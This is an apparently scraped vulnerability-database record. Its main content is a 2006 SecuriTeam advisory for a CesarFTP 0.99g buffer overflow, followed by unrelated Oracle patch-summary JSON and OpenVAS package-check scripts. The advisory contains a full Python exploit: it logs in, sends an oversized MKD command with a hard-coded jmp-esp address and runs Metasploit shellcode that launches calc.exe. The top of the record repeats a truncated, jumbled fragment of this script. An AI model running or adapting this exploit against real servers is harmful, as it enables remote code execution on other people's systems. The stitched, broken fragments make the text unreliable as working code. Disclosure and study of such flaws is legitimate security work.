ID SECURITYVULNS:DOC:13098 Type securityvulns Reporter Securityvulns Modified 2006-06-11T00:00:00
Description
The following security advisory is sent to the securiteam mailing list, and can be found at the
SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
CesarFTP Buffer Overflow (Exploit)
SUMMARY
" <http://www.aclogic.com/> CesarFTP is an easy-to-use and fast to
configure FTP server. "
Improper input validation allows attackers to execute arbitrary code using
CeasrFTP.
def intel_order(i):
a = chr(i % 256)
i = i >> 8
b = chr(i % 256)
i = i >> 8
c = chr(i % 256)
i = i >> 8
d = chr(i % 256)
str = "%c%c%c%c" % (a, b, c, d)
return str
host = "127.0.0.1"
port = 21
user = "h07"
password = "open"
EIP = 0x7CA58265 #jmp esp <shell32.dll XP sp2 polish>
s = socket(AF_INET, SOCK_STREAM)
s.connect((host, port))
print s.recv(1024)
The information has been provided by <mailto:h07@interia.pl> h07.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to:
list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental,
consequential, loss of business profits or special damages.
{"id": "SECURITYVULNS:DOC:13098", "bulletinFamily": "software", "title": "[EXPL] CesarFTP Buffer Overflow (Exploit)", "description": "The following security advisory is sent to the securiteam mailing list, and can be found at the\r\nSecuriTeam web site: http://www.securiteam.com\r\n- - promotion\r\n\r\nThe SecuriTeam alerts list - Free, Accurate, Independent.\r\n\r\nGet your security news from a reliable source.\r\nhttp://www.securiteam.com/mailinglist.html \r\n\r\n- - - - - - - - -\r\n\r\n\r\n\r\n CesarFTP Buffer Overflow (Exploit)\r\n------------------------------------------------------------------------\r\n\r\n\r\nSUMMARY\r\n\r\n" <http://www.aclogic.com/> CesarFTP is an easy-to-use and fast to \r\nconfigure FTP server. "\r\n\r\nImproper input validation allows attackers to execute arbitrary code using \r\nCeasrFTP.\r\n\r\nDETAILS\r\n\r\nVulnerable Systems:\r\n * CesarFTP version 0.99g\r\n\r\nExploit:\r\n#!/usr/bin/python\r\n#CesarFtp 0.99g 0day Exploit\r\n#Proof of Concept: execute calc.exe\r\n#Tested on XP sp2 polish\r\n#Bug found by h07 [h07@interia.pl]\r\n#Date: 10.06.2006\r\n\r\nfrom socket import *\r\n\r\nshellcode = ( #execute calc.exe <metasploit.com>\r\n"\x31\xc9\x83\xe9\xdb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xd8"\r\n"\x22\x72\xe4\x83\xeb\xfc\xe2\xf4\x24\xca\x34\xe4\xd8\x22\xf9\xa1"\r\n"\xe4\xa9\x0e\xe1\xa0\x23\x9d\x6f\x97\x3a\xf9\xbb\xf8\x23\x99\x07"\r\n"\xf6\x6b\xf9\xd0\x53\x23\x9c\xd5\x18\xbb\xde\x60\x18\x56\x75\x25"\r\n"\x12\x2f\x73\x26\x33\xd6\x49\xb0\xfc\x26\x07\x07\x53\x7d\x56\xe5"\r\n"\x33\x44\xf9\xe8\x93\xa9\x2d\xf8\xd9\xc9\xf9\xf8\x53\x23\x99\x6d"\r\n"\x84\x06\x76\x27\xe9\xe2\x16\x6f\x98\x12\xf7\x24\xa0\x2d\xf9\xa4"\r\n"\xd4\xa9\x02\xf8\x75\xa9\x1a\xec\x31\x29\x72\xe4\xd8\xa9\x32\xd0"\r\n"\xdd\x5e\x72\xe4\xd8\xa9\x1a\xd8\x87\x13\x84\x84\x8e\xc9\x7f\x8c"\r\n"\x28\xa8\x76\xbb\xb0\xba\x8c\x6e\xd6\x75\x8d\x03\x30\xcc\x8d\x1b"\r\n"\x27\x41\x13\x88\xbb\x0c\x17\x9c\xbd\x22\x72\xe4")\r\n\r\ndef intel_order(i):\r\n a = chr(i % 256)\r\n i = i >> 8\r\n b = chr(i % 256)\r\n i = i >> 8\r\n c = chr(i % 256)\r\n i = i >> 8\r\n d = chr(i % 256)\r\n str = "%c%c%c%c" % (a, b, c, d)\r\n return str\r\n\r\nhost = "127.0.0.1"\r\nport = 21\r\nuser = "h07"\r\npassword = "open"\r\nEIP = 0x7CA58265 #jmp esp <shell32.dll XP sp2 polish>\r\n\r\ns = socket(AF_INET, SOCK_STREAM)\r\ns.connect((host, port))\r\nprint s.recv(1024)\r\n\r\ns.send("user %s\r\n" % (user))\r\nprint s.recv(1024)\r\n\r\ns.send("pass %s\r\n" % (password))\r\nprint s.recv(1024)\r\n\r\nbuffer = "MKD "\r\nbuffer += "\n" * 671\r\nbuffer += "A" * 3 + intel_order(EIP)\r\nbuffer += "\x90" * 40 + shellcode\r\nbuffer += "\r\n"\r\n\r\nprint "len: %d" % (len(buffer))\r\n\r\ns.send(buffer)\r\nprint s.recv(1024)\r\n\r\ns.close()\r\n\r\n#EoF\r\n\r\n\r\nADDITIONAL INFORMATION\r\n\r\nThe information has been provided by <mailto:h07@interia.pl> h07.\r\n\r\n\r\n\r\n======================================== \r\n\r\n\r\nThis bulletin is sent to members of the SecuriTeam mailing list. \r\nTo unsubscribe from the list, send mail with an empty subject line and body to:\r\nlist-unsubscribe@securiteam.com \r\nIn order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com \r\n\r\n\r\n==================== \r\n==================== \r\n\r\nDISCLAIMER: \r\nThe information in this bulletin is provided "AS IS" without warranty of any kind. \r\nIn no event shall we be liable for any damages whatsoever including direct, indirect, incidental,\r\nconsequential, loss of business profits or special damages. \r\n\r\n\r\n\r\n", "published": "2006-06-11T00:00:00", "modified": "2006-06-11T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:13098", "reporter": "Securityvulns", "references": [], "cvelist": [], "type": "securityvulns", "lastseen": "2018-08-31T11:10:17", "edition": 1, "viewCount": 27, "enchantments": {"score": {"value": 2.9, "vector": "NONE", "modified": "2018-08-31T11:10:17", "rev": 2}, "dependencies": {"references": [{"type": "threatpost", "idList": ["THREATPOST:F3563336B135A1D7C1251AE54FDC6286"]}, {"type": "nessus", "idList": ["EULEROS_SA-2020-1318.NASL", "EULEROS_SA-2020-1323.NASL", "FREEBSD_PKG_090763F6703011EA93DD080027846A02.NASL", "EULEROS_SA-2020-1314.NASL", "DEBIAN_DLA-2164.NASL", "FREEBSD_PKG_40194E1C6D8911EA808280EE73419AF3.NASL", "FREEBSD_PKG_D887B3D9736611EAB81A001CC0382B2F.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562311220201314", "OPENVAS:1361412562311220201323", "OPENVAS:1361412562310892164", "OPENVAS:1361412562311220201318"]}, {"type": "debian", "idList": ["DEBIAN:DLA-2164-1:52F3C"]}, {"type": "freebsd", "idList": ["D887B3D9-7366-11EA-B81A-001CC0382B2F"]}, {"type": "zdt", "idList": ["1337DAY-ID-34159", "1337DAY-ID-34153", "1337DAY-ID-34157", "1337DAY-ID-34144", "1337DAY-ID-34134"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:10149"]}], "modified": "2018-08-31T11:10:17", "rev": 2}, "vulnersScore": 2.9}, "affectedSoftware": []}
{"oracle": [{"lastseen": "2020-12-24T15:41:14", "bulletinFamily": "software", "cvelist": ["CVE-2013-7285", "CVE-2015-1832", "CVE-2015-9251", "CVE-2016-0701", "CVE-2016-1000031", "CVE-2016-1000338", "CVE-2016-1000339", "CVE-2016-1000340", "CVE-2016-1000341", "CVE-2016-1000342", "CVE-2016-1000343", "CVE-2016-1000344", "CVE-2016-1000345", "CVE-2016-1000346", "CVE-2016-1000352", "CVE-2016-10244", "CVE-2016-10328", "CVE-2016-2167", "CVE-2016-2168", "CVE-2016-2183", "CVE-2016-2510", "CVE-2016-3189", "CVE-2016-4800", "CVE-2016-5000", "CVE-2016-5300", "CVE-2016-5725", "CVE-2016-6153", "CVE-2016-6306", "CVE-2016-8610", "CVE-2016-8734", "CVE-2017-10989", "CVE-2017-12626", "CVE-2017-13098", "CVE-2017-13685", "CVE-2017-13745", "CVE-2017-14232", "CVE-2017-15095", "CVE-2017-15286", "CVE-2017-17485", "CVE-2017-3164", "CVE-2017-5644", "CVE-2017-5645", "CVE-2017-5662", "CVE-2017-7525", "CVE-2017-7656", "CVE-2017-7657", "CVE-2017-7658", "CVE-2017-7857", "CVE-2017-7858", "CVE-2017-7864", "CVE-2017-8105", "CVE-2017-8287", "CVE-2017-9096", "CVE-2017-9735", "CVE-2017-9800", "CVE-2018-1000180", "CVE-2018-1000613", "CVE-2018-1000873", "CVE-2018-11054", "CVE-2018-11055", "CVE-2018-11056", "CVE-2018-11057", "CVE-2018-11058", "CVE-2018-11307", "CVE-2018-12022", "CVE-2018-12023", "CVE-2018-12536", "CVE-2018-12538", "CVE-2018-12545", "CVE-2018-14718", "CVE-2018-15769", "CVE-2018-17196", "CVE-2018-18873", "CVE-2018-19139", "CVE-2018-19539", "CVE-2018-19540", "CVE-2018-19541", "CVE-2018-19542", "CVE-2018-19543", "CVE-2018-20346", "CVE-2018-20505", "CVE-2018-20506", "CVE-2018-20570", "CVE-2018-20584", "CVE-2018-20622", "CVE-2018-20843", "CVE-2018-2765", "CVE-2018-3693", "CVE-2018-5382", "CVE-2018-5968", "CVE-2018-6942", "CVE-2018-7489", "CVE-2018-8013", "CVE-2018-8088", "CVE-2018-8740", "CVE-2018-9055", "CVE-2018-9154", "CVE-2018-9252", "CVE-2019-0192", "CVE-2019-0201", "CVE-2019-10072", "CVE-2019-10097", "CVE-2019-1010239", "CVE-2019-10173", "CVE-2019-10241", "CVE-2019-10246", "CVE-2019-10247", "CVE-2019-10744", "CVE-2019-11048", "CVE-2019-11358", "CVE-2019-11477", "CVE-2019-11478", "CVE-2019-11479", "CVE-2019-11834", "CVE-2019-11835", "CVE-2019-11922", "CVE-2019-12086", "CVE-2019-12260", "CVE-2019-12261", "CVE-2019-12384", "CVE-2019-12402", "CVE-2019-12415", "CVE-2019-12419", "CVE-2019-12423", "CVE-2019-12814", "CVE-2019-12900", "CVE-2019-13990", "CVE-2019-14379", "CVE-2019-14540", "CVE-2019-14893", "CVE-2019-1547", "CVE-2019-1549", "CVE-2019-1552", "CVE-2019-1563", "CVE-2019-15903", "CVE-2019-16168", "CVE-2019-16335", "CVE-2019-16942", "CVE-2019-16943", "CVE-2019-17091", "CVE-2019-17267", "CVE-2019-17359", "CVE-2019-17495", "CVE-2019-17531", "CVE-2019-17543", "CVE-2019-17558", "CVE-2019-17569", "CVE-2019-17632", "CVE-2019-17638", "CVE-2019-18348", "CVE-2019-20330", "CVE-2019-2897", "CVE-2019-2904", "CVE-2019-3738", "CVE-2019-3739", "CVE-2019-3740", "CVE-2019-5018", "CVE-2019-5427", "CVE-2019-5435", "CVE-2019-5436", "CVE-2019-5443", "CVE-2019-5481", "CVE-2019-5482", "CVE-2019-8457", "CVE-2019-9511", "CVE-2019-9513", "CVE-2019-9936", "CVE-2019-9937", "CVE-2020-10108", "CVE-2020-10543", "CVE-2020-10650", "CVE-2020-10672", "CVE-2020-10673", "CVE-2020-10683", "CVE-2020-10722", "CVE-2020-10723", "CVE-2020-10724", "CVE-2020-10878", "CVE-2020-10968", "CVE-2020-10969", "CVE-2020-11022", "CVE-2020-11023", "CVE-2020-11080", "CVE-2020-11111", "CVE-2020-11112", "CVE-2020-11113", "CVE-2020-11619", "CVE-2020-11620", "CVE-2020-11655", "CVE-2020-11656", "CVE-2020-11971", "CVE-2020-11972", "CVE-2020-11973", "CVE-2020-11984", "CVE-2020-11993", "CVE-2020-11996", "CVE-2020-12243", "CVE-2020-12723", "CVE-2020-13630", "CVE-2020-13631", "CVE-2020-13632", "CVE-2020-13920", "CVE-2020-13934", "CVE-2020-13935", "CVE-2020-14060", "CVE-2020-14061", "CVE-2020-14062", "CVE-2020-14195", "CVE-2020-14672", "CVE-2020-14731", "CVE-2020-14732", "CVE-2020-14734", "CVE-2020-14735", "CVE-2020-14736", "CVE-2020-14740", "CVE-2020-14741", "CVE-2020-14742", "CVE-2020-14743", "CVE-2020-14744", "CVE-2020-14745", "CVE-2020-14746", "CVE-2020-14752", "CVE-2020-14753", "CVE-2020-14754", "CVE-2020-14757", "CVE-2020-14758", "CVE-2020-14759", "CVE-2020-14760", "CVE-2020-14761", "CVE-2020-14762", "CVE-2020-14763", "CVE-2020-14764", "CVE-2020-14765", "CVE-2020-14766", "CVE-2020-14767", "CVE-2020-14768", "CVE-2020-14769", "CVE-2020-14770", "CVE-2020-14771", "CVE-2020-14772", "CVE-2020-14773", "CVE-2020-14774", "CVE-2020-14775", "CVE-2020-14776", "CVE-2020-14777", "CVE-2020-14778", "CVE-2020-14779", "CVE-2020-14780", "CVE-2020-14781", "CVE-2020-14782", "CVE-2020-14783", "CVE-2020-14784", "CVE-2020-14785", "CVE-2020-14786", "CVE-2020-14787", "CVE-2020-14788", "CVE-2020-14789", "CVE-2020-14790", "CVE-2020-14791", "CVE-2020-14792", "CVE-2020-14793", "CVE-2020-14794", "CVE-2020-14795", "CVE-2020-14796", "CVE-2020-14797", "CVE-2020-14798", "CVE-2020-14799", "CVE-2020-14800", "CVE-2020-14801", "CVE-2020-14802", "CVE-2020-14803", "CVE-2020-14804", "CVE-2020-14805", "CVE-2020-14806", "CVE-2020-14807", "CVE-2020-14808", "CVE-2020-14809", "CVE-2020-14810", "CVE-2020-14811", "CVE-2020-14812", "CVE-2020-14813", "CVE-2020-14814", "CVE-2020-14815", "CVE-2020-14816", "CVE-2020-14817", "CVE-2020-14818", "CVE-2020-14819", "CVE-2020-14820", "CVE-2020-14821", "CVE-2020-14822", "CVE-2020-14823", "CVE-2020-14824", "CVE-2020-14825", "CVE-2020-14826", "CVE-2020-14827", "CVE-2020-14828", "CVE-2020-14829", "CVE-2020-14830", "CVE-2020-14831", "CVE-2020-14832", "CVE-2020-14833", "CVE-2020-14834", "CVE-2020-14835", "CVE-2020-14836", "CVE-2020-14837", "CVE-2020-14838", "CVE-2020-14839", "CVE-2020-14840", "CVE-2020-14841", "CVE-2020-14842", "CVE-2020-14843", "CVE-2020-14844", "CVE-2020-14845", "CVE-2020-14846", "CVE-2020-14847", "CVE-2020-14848", "CVE-2020-14849", "CVE-2020-14850", "CVE-2020-14851", "CVE-2020-14852", "CVE-2020-14853", "CVE-2020-14854", "CVE-2020-14855", "CVE-2020-14856", "CVE-2020-14857", "CVE-2020-14858", "CVE-2020-14859", "CVE-2020-14860", "CVE-2020-14861", "CVE-2020-14862", "CVE-2020-14863", "CVE-2020-14864", "CVE-2020-14865", "CVE-2020-14866", "CVE-2020-14867", "CVE-2020-14868", "CVE-2020-14869", "CVE-2020-14870", "CVE-2020-14871", "CVE-2020-14872", "CVE-2020-14873", "CVE-2020-14875", "CVE-2020-14876", "CVE-2020-14877", "CVE-2020-14878", "CVE-2020-14879", "CVE-2020-14880", "CVE-2020-14881", "CVE-2020-14882", "CVE-2020-14883", "CVE-2020-14884", "CVE-2020-14885", "CVE-2020-14886", "CVE-2020-14887", "CVE-2020-14888", "CVE-2020-14889", "CVE-2020-14890", "CVE-2020-14891", "CVE-2020-14892", "CVE-2020-14893", "CVE-2020-14894", "CVE-2020-14895", "CVE-2020-14896", "CVE-2020-14897", "CVE-2020-14898", "CVE-2020-14899", "CVE-2020-14900", "CVE-2020-14901", "CVE-2020-15358", "CVE-2020-15389", "CVE-2020-1730", "CVE-2020-1935", "CVE-2020-1938", "CVE-2020-1941", "CVE-2020-1945", "CVE-2020-1950", "CVE-2020-1951", "CVE-2020-1953", "CVE-2020-1954", "CVE-2020-1967", "CVE-2020-2555", "CVE-2020-3235", "CVE-2020-3909", "CVE-2020-4051", "CVE-2020-5397", "CVE-2020-5398", "CVE-2020-5407", "CVE-2020-5408", "CVE-2020-7067", "CVE-2020-8172", "CVE-2020-8174", "CVE-2020-8840", "CVE-2020-9281", "CVE-2020-9327", "CVE-2020-9409", "CVE-2020-9410", "CVE-2020-9484", "CVE-2020-9488", "CVE-2020-9489", "CVE-2020-9490", "CVE-2020-9546", "CVE-2020-9547", "CVE-2020-9548"], "description": "A Critical Patch Update is a collection of patches for multiple security vulnerabilities. These patches address vulnerabilities in Oracle code and in third-party components included in Oracle products. These patches are usually cumulative, but each advisory describes only the security patches added since the previous Critical Patch Update Advisory. Thus, prior Critical Patch Update advisories should be reviewed for information regarding earlier published security patches. Refer to [\u201cCritical Patch Updates, Security Alerts and Bulletins\u201d](<https://www.oracle.com/security-alerts/>) for information about Oracle Security advisories. \n \nStarting with the October 2020 Critical Patch Update, Oracle lists updates that address vulnerabilities in third-party components which are not exploitable in the context of their inclusion in their respective Oracle product beneath the product's risk matrix. Oracle has published two versions of the October 2020 Critical Patch Update Advisory: this version of the advisory implemented the change in how non-exploitable vulnerabilities in third-party components are reported, and the \u201ctraditional\u201d advisory follows the same format as the previous advisories. The \u201ctraditional\u201d advisory is published at <https://www.oracle.com/security-alerts/cpuoct2020traditional.html>. \n\n**Oracle continues to periodically receive reports of attempts to maliciously exploit vulnerabilities for which Oracle has already released security patches. In some instances, it has been reported that attackers have been successful because targeted customers had failed to apply available Oracle patches. Oracle therefore strongly recommends that customers remain on actively-supported versions and apply Critical Patch Update security patches without delay.**\n\nThis Critical Patch Update contains 403 new security patches across the product families listed below. Please note that an MOS note summarizing the content of this Critical Patch Update and other Oracle Software Security Assurance activities is located at [ October 2020 Critical Patch Update: Executive Summary and Analysis](<https://support.oracle.com/rs?type=doc&id=2712240.1>).\n", "modified": "2020-12-08T00:00:00", "published": "2020-10-20T00:00:00", "id": "ORACLE:CPUOCT2020", "href": "", "type": "oracle", "title": "Oracle Critical Patch Update Advisory - October 2020", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "suse": [{"lastseen": "2020-05-04T02:46:33", "bulletinFamily": "unix", "cvelist": ["CVE-2018-1000613", "CVE-2017-13098"], "description": "This update for bouncycastle fixes the following issues:\n\n Version update to 1.60:\n\n * CVE-2018-1000613: Use of Externally-ControlledInput to Select Classes or\n Code (boo#1100694)\n\n * Release notes: <a rel=\"nofollow\" href=\"http://www.bouncycastle.org/releasenotes.html\">http://www.bouncycastle.org/releasenotes.html</a>\n\n Version update to 1.59:\n\n * CVE-2017-13098: Fix against Bleichenbacher oracle when not using the\n lightweight APIs (boo#1072697).\n * Release notes: <a rel=\"nofollow\" href=\"http://www.bouncycastle.org/releasenotes.html\">http://www.bouncycastle.org/releasenotes.html</a>\n\n", "edition": 1, "modified": "2020-05-04T00:17:37", "published": "2020-05-04T00:17:37", "id": "OPENSUSE-SU-2020:0607-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2020-05/msg00011.html", "title": "Security update for bouncycastle (moderate)", "type": "suse", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "openvas": [{"lastseen": "2020-05-08T16:40:59", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-1000613", "CVE-2017-13098"], "description": "The remote host is missing an update for the ", "modified": "2020-05-07T00:00:00", "published": "2020-05-04T00:00:00", "id": "OPENVAS:1361412562310853141", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310853141", "type": "openvas", "title": "openSUSE: Security Advisory for bouncycastle (openSUSE-SU-2020:0607-1)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.853141\");\n script_version(\"2020-05-07T07:41:43+0000\");\n script_cve_id(\"CVE-2017-13098\", \"CVE-2018-1000613\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-05-07 07:41:43 +0000 (Thu, 07 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-05-04 03:00:39 +0000 (Mon, 04 May 2020)\");\n script_name(\"openSUSE: Security Advisory for bouncycastle (openSUSE-SU-2020:0607-1)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSELeap15\\.1\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2020:0607-1\");\n script_xref(name:\"URL\", value:\"http://lists.opensuse.org/opensuse-security-announce/2020-05/msg00011.html\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'bouncycastle'\n package(s) announced via the openSUSE-SU-2020:0607-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This update for bouncycastle fixes the following issues:\n\n Version update to 1.60:\n\n * CVE-2018-1000613: Use of Externally-ControlledInput to Select Classes or\n Code (boo#1100694)\n\n Version update to 1.59:\n\n * CVE-2017-13098: Fix against Bleichenbacher oracle when not using the\n lightweight APIs (boo#1072697).\n\n\n Patch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended\n installation methods\n like YaST online_update or 'zypper patch'.\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Leap 15.1:\n\n zypper in -t patch openSUSE-2020-607=1\");\n\n script_tag(name:\"affected\", value:\"'bouncycastle' package(s) on openSUSE Leap 15.1.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSELeap15.1\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"bouncycastle\", rpm:\"bouncycastle~1.60~lp151.3.3.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ouncycastle-javadoc\", rpm:\"ouncycastle-javadoc~1.60~lp151.3.3.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-02-05T16:38:04", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-8655", "CVE-2018-13098", "CVE-2014-7822", "CVE-2017-5577", "CVE-2017-7346", "CVE-2017-18075", "CVE-2017-5970", "CVE-2017-0523", "CVE-2017-8831", "CVE-2016-2547", "CVE-2018-16862", "CVE-2016-7425", "CVE-2017-1000112", "CVE-2014-9803", "CVE-2015-8374", "CVE-2014-0049", "CVE-2017-18216", "CVE-2017-8797", "CVE-2018-6554", "CVE-2018-20511"], "description": "The remote host is missing an update for the Huawei EulerOS\n ", "modified": "2020-02-05T00:00:00", "published": "2020-01-23T00:00:00", "id": "OPENVAS:1361412562311220191482", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220191482", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for kernel (EulerOS-SA-2019-1482)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2019.1482\");\n script_version(\"2020-02-05T08:56:28+0000\");\n script_cve_id(\"CVE-2014-0049\", \"CVE-2014-7822\", \"CVE-2014-9803\", \"CVE-2015-8374\", \"CVE-2016-2547\", \"CVE-2016-7425\", \"CVE-2016-8655\", \"CVE-2017-0523\", \"CVE-2017-1000112\", \"CVE-2017-18075\", \"CVE-2017-18216\", \"CVE-2017-5577\", \"CVE-2017-5970\", \"CVE-2017-7346\", \"CVE-2017-8797\", \"CVE-2017-8831\", \"CVE-2018-13098\", \"CVE-2018-16862\", \"CVE-2018-20511\", \"CVE-2018-6554\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-02-05 08:56:28 +0000 (Wed, 05 Feb 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 11:52:36 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for kernel (EulerOS-SA-2019-1482)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROSVIRTARM64-3\\.0\\.1\\.0\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2019-1482\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-1482\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'kernel' package(s) announced via the EulerOS-SA-2019-1482 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"An information-leak vulnerability was found in the kernel when it truncated a file to a smaller size which consisted of an inline extent that was compressed. The data between the new file size and the old file size was not discarded and the number of bytes used by the inode were not correctly decremented, which gave the wrong report for callers of the stat(2) syscall. This wasted metadata space and allowed for the truncated data to be leaked, and data corruption or loss to occur. A caller of the clone ioctl could exploit this flaw by using only standard file-system operations without root access to read the truncated data.(CVE-2015-8374)\n\ncrypto/pcrypt.c in the Linux kernel, before 4.14.13, mishandles freeing instances, allowing a local user able to access the AF_ALG-based AEAD interface (CONFIG_CRYPTO_USER_API_AEAD) and pcrypt (CONFIG_CRYPTO_PCRYPT) to cause a denial of service (kfree of an incorrect pointer) or possibly have unspecified other impact by executing a crafted sequence of system calls. Due to the nature of the flaw, privilege escalation cannot be fully ruled out, although we believe it is unlikely.(CVE-2017-18075)\n\nAn elevation of privilege vulnerability in the Qualcomm Wi-Fi driver could enable a local malicious application to execute arbitrary code within the context of the kernel. This issue is rated as High because it first requires compromising a privileged process. Product: Android. Versions: N/A. Android ID: A-32835279. References: QC-CR#1096945.(CVE-2017-0523)\n\nThe saa7164_bus_get function in drivers/media/pci/saa7164/saa7164-bus.c in the Linux kernel through 4.10.14 allows local users to cause a denial of service (out-of-bounds array access) or possibly have unspecified other impact by changing a certain sequence-number value, aka a 'double fetch' vulnerability.(CVE-2017-8831)\n\nA flaw was found in the way the Linux kernel's splice() system call validated its parameters. On certain file systems, a local, unprivileged user could use this flaw to write past the maximum file size, and thus crash the system.(CVE-2014-7822)\n\nThe vc4_get_bcl function in drivers/gpu/drm/vc4/vc4_gem.c in the VideoCore DRM driver in the Linux kernel before 4.9.7 does not set an errno value upon certain overflow detections allowing local users to cause a denial of service (incorrect pointer dereference and OOPS) via inconsistent size values in a VC4_SUBMIT_CL ioctl call.(CVE-2017-5577)\n\nIn fs/ocfs2/cluster/nodemanager.c in the Linux kernel before 4.15, local users can cause a denial of service (NULL pointer dereference and BUG) because a required mutex is not used.(CVE-2017-18216) ...\n\n Description truncated. Please see the references for more information.\");\n\n script_tag(name:\"affected\", value:\"'kernel' package(s) on Huawei EulerOS Virtualization for ARM 64 3.0.1.0.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROSVIRTARM64-3.0.1.0\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~4.19.28~1.2.117\", rls:\"EULEROSVIRTARM64-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = 